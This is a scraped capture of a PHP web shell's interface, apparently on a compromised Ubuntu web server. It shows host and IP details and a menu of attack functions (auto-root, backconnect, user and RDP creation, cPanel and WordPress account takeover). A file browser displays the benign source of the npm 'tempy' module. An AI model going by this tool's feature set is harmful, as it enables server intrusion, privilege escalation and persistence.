Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
tempy /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
index.d.ts
2.75
KB
-rw-rw-rw-
index.js
1.51
KB
-rw-rw-rw-
license
1.09
KB
-rw-rw-rw-
package.json
923
B
-rw-rw-rw-
readme.md
2.46
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; const fs = require('fs'); const path = require('path'); const uniqueString = require('unique-string'); const tempDir = require('temp-dir'); const isStream = require('is-stream'); const stream = require('stream'); const {promisify} = require('util'); const pipeline = promisify(stream.pipeline); const {writeFile} = fs.promises; const getPath = (prefix = '') => path.join(tempDir, prefix + uniqueString()); const writeStream = async (filePath, data) => pipeline(data, fs.createWriteStream(filePath)); module.exports.file = options => { options = { ...options }; if (options.name) { if (options.extension !== undefined && options.extension !== null) { throw new Error('The `name` and `extension` options are mutually exclusive'); } return path.join(module.exports.directory(), options.name); } return getPath() + (options.extension === undefined || options.extension === null ? '' : '.' + options.extension.replace(/^\./, '')); }; module.exports.directory = ({prefix = ''} = {}) => { const directory = getPath(prefix); fs.mkdirSync(directory); return directory; }; module.exports.write = async (data, options) => { const filename = module.exports.file(options); const write = isStream(data) ? writeStream : writeFile; await write(filename, data); return filename; }; module.exports.writeSync = (data, options) => { const filename = module.exports.file(options); fs.writeFileSync(filename, data); return filename; }; Object.defineProperty(module.exports, 'root', { get() { return tempDir; } });
Close